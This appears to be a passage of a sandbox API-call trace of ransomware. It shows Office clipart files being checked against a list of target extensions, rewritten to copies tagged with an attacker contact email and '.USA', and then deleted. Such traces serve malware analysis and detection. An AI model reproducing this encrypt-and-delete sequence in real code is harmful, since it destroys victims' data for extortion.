lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.300] lstrlenW (lpString=".pdf") returned 4 [0270.300] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.300] lstrlenW (lpString=".xls") returned 4 [0270.300] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.300] lstrlenW (lpString=".xlsx") returned 5 [0270.300] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.300] lstrlenW (lpString=".ppt") returned 4 [0270.300] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0270.300] lstrlenW (lpString=".zip") returned 4 [0270.300] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.300] lstrlenW (lpString=".rar") returned 4 [0270.300] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.300] lstrlenW (lpString=".bz2") returned 4 [0270.300] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.300] lstrlenW (lpString=".7z") returned 3 [0270.300] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0270.301] lstrlenW (lpString=".dbf") returned 4 [0270.301] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0270.301] lstrlenW (lpString=".1cd") returned 4 [0270.301] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0270.301] lstrlenW (lpString=".jpg") returned 4 [0270.301] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.301] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.301] lstrlenW (lpString="DD01629_.WMF") returned 12 [0270.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0270.301] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=580) returned 1 [0270.301] CloseHandle (hObject=0x348) returned 1 [0270.301] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf")) returned 0x20 [0270.301] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0270.302] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.302] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.302] GetLastError () returned 0x0 [0270.302] ReadFile (in: hFile=0x348, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x244, lpOverlapped=0x0) returned 1 [0270.303] WriteFile (in: hFile=0x3b0, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x250, lpOverlapped=0x0) returned 1 [0270.304] ReadFile (in: hFile=0x348, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.304] WriteFile (in: hFile=0x3b0, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.304] SetEndOfFile (hFile=0x3b0) returned 1 [0270.304] CloseHandle (hObject=0x3b0) returned 1 [0270.304] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.304] SetEndOfFile (hFile=0x348) returned 1 [0270.387] CloseHandle (hObject=0x348) returned 1 [0270.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.388] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf")) returned 1 [0270.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0270.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0270.765] lstrlenW (lpString=".doc") returned 4 [0270.765] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.765] lstrlenW (lpString=".docx") returned 5 [0270.765] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.765] lstrlenW (lpString=".pdf") returned 4 [0270.765] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.765] lstrlenW (lpString=".xls") returned 4 [0270.765] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.765] lstrlenW (lpString=".xlsx") returned 5 [0270.765] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.765] lstrlenW (lpString=".ppt") returned 4 [0270.765] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0270.765] lstrlenW (lpString=".zip") returned 4 [0270.765] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.765] lstrlenW (lpString=".rar") returned 4 [0270.765] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.765] lstrlenW (lpString=".bz2") returned 4 [0270.765] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.765] lstrlenW (lpString=".7z") returned 3 [0270.765] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0270.766] lstrlenW (lpString=".dbf") returned 4 [0270.766] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0270.766] lstrlenW (lpString=".1cd") returned 4 [0270.766] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0270.766] lstrlenW (lpString=".jpg") returned 4 [0270.766] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0270.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0270.766] lstrlenW (lpString=".doc") returned 4 [0270.766] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.766] lstrlenW (lpString=".docx") returned 5 [0270.766] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.766] lstrlenW (lpString=".pdf") returned 4 [0270.766] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.766] lstrlenW (lpString=".xls") returned 4 [0270.766] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.766] lstrlenW (lpString=".xlsx") returned 5 [0270.766] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.766] lstrlenW (lpString=".ppt") returned 4 [0270.766] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0270.766] lstrlenW (lpString=".zip") returned 4 [0270.766] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.766] lstrlenW (lpString=".rar") returned 4 [0270.766] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.766] lstrlenW (lpString=".bz2") returned 4 [0270.767] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.767] lstrlenW (lpString=".7z") returned 3 [0270.767] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0270.767] lstrlenW (lpString=".dbf") returned 4 [0270.767] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0270.767] lstrlenW (lpString=".1cd") returned 4 [0270.767] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0270.767] lstrlenW (lpString=".jpg") returned 4 [0270.767] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.767] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.767] lstrlenW (lpString="DD01793_.WMF") returned 12 [0270.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0270.768] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=3252) returned 1 [0270.768] CloseHandle (hObject=0x394) returned 1 [0270.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf")) returned 0x20 [0270.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0270.768] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.768] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.768] GetLastError () returned 0x0 [0270.768] ReadFile (in: hFile=0x394, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xcb4, lpOverlapped=0x0) returned 1 [0270.779] WriteFile (in: hFile=0x384, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xcc0, lpOverlapped=0x0) returned 1 [0270.779] ReadFile (in: hFile=0x394, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.779] WriteFile (in: hFile=0x384, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.779] SetEndOfFile (hFile=0x384) returned 1 [0270.779] CloseHandle (hObject=0x384) returned 1 [0270.780] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.780] SetEndOfFile (hFile=0x394) returned 1 [0270.781] CloseHandle (hObject=0x394) returned 1 [0270.782] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.820] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf")) returned 1 [0270.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0270.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0270.820] lstrlenW (lpString=".doc") returned 4 [0270.820] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.820] lstrlenW (lpString=".docx") returned 5 [0270.820] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.820] lstrlenW (lpString=".pdf") returned 4 [0270.820] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.820] lstrlenW (lpString=".xls") returned 4 [0270.820] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.820] lstrlenW (lpString=".xlsx") returned 5 [0270.820] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.820] lstrlenW (lpString=".ppt") returned 4 [0270.820] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0270.820] lstrlenW (lpString=".zip") returned 4 [0270.820] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.821] lstrlenW (lpString=".rar") returned 4 [0270.821] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.821] lstrlenW (lpString=".bz2") returned 4 [0270.821] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.821] lstrlenW (lpString=".7z") returned 3 [0270.821] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0270.821] lstrlenW (lpString=".dbf") returned 4 [0270.821] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0270.821] lstrlenW (lpString=".1cd") returned 4 [0270.821] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0270.821] lstrlenW (lpString=".jpg") returned 4 [0270.821] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0270.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0270.821] lstrlenW (lpString=".doc") returned 4 [0270.821] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.821] lstrlenW (lpString=".docx") returned 5 [0270.821] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.821] lstrlenW (lpString=".pdf") returned 4 [0270.821] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.821] lstrlenW (lpString=".xls") returned 4 [0270.821] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.821] lstrlenW (lpString=".xlsx") returned 5 [0270.821] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.821] lstrlenW (lpString=".ppt") returned 4 [0270.822] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0270.822] lstrlenW (lpString=".zip") returned 4 [0270.822] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.822] lstrlenW (lpString=".rar") returned 4 [0270.822] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.822] lstrlenW (lpString=".bz2") returned 4 [0270.822] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.822] lstrlenW (lpString=".7z") returned 3 [0270.822] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0270.822] lstrlenW (lpString=".dbf") returned 4 [0270.822] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0270.822] lstrlenW (lpString=".1cd") returned 4 [0270.822] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0270.822] lstrlenW (lpString=".jpg") returned 4 [0270.822] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.822] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.822] lstrlenW (lpString="ED00172_.WMF") returned 12 [0270.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.823] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2700) returned 1 [0270.823] CloseHandle (hObject=0x384) returned 1 [0270.823] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf")) returned 0x20 [0270.823] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.823] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.823] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.823] GetLastError () returned 0x0 [0270.824] ReadFile (in: hFile=0x384, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xa8c, lpOverlapped=0x0) returned 1 [0270.855] WriteFile (in: hFile=0x328, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xa90, lpOverlapped=0x0) returned 1 [0270.856] ReadFile (in: hFile=0x384, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.856] WriteFile (in: hFile=0x328, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.856] SetEndOfFile (hFile=0x328) returned 1 [0270.856] CloseHandle (hObject=0x328) returned 1 [0270.856] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.856] SetEndOfFile (hFile=0x384) returned 1 [0270.859] CloseHandle (hObject=0x384) returned 1 [0270.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.866] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf")) returned 1 [0270.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0270.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0270.924] lstrlenW (lpString=".doc") returned 4 [0270.924] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.924] lstrlenW (lpString=".docx") returned 5 [0270.924] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.924] lstrlenW (lpString=".pdf") returned 4 [0270.924] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.924] lstrlenW (lpString=".xls") returned 4 [0270.924] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.924] lstrlenW (lpString=".xlsx") returned 5 [0270.924] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.924] lstrlenW (lpString=".ppt") returned 4 [0270.924] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0270.924] lstrlenW (lpString=".zip") returned 4 [0270.924] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.924] lstrlenW (lpString=".rar") returned 4 [0270.925] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.925] lstrlenW (lpString=".bz2") returned 4 [0270.925] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.925] lstrlenW (lpString=".7z") returned 3 [0270.925] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0270.925] lstrlenW (lpString=".dbf") returned 4 [0270.925] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0270.925] lstrlenW (lpString=".1cd") returned 4 [0270.925] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0270.925] lstrlenW (lpString=".jpg") returned 4 [0270.925] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0270.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0270.925] lstrlenW (lpString=".doc") returned 4 [0270.925] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.925] lstrlenW (lpString=".docx") returned 5 [0270.925] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.926] lstrlenW (lpString=".pdf") returned 4 [0270.926] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.926] lstrlenW (lpString=".xls") returned 4 [0270.926] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.926] lstrlenW (lpString=".xlsx") returned 5 [0270.926] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.926] lstrlenW (lpString=".ppt") returned 4 [0270.926] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 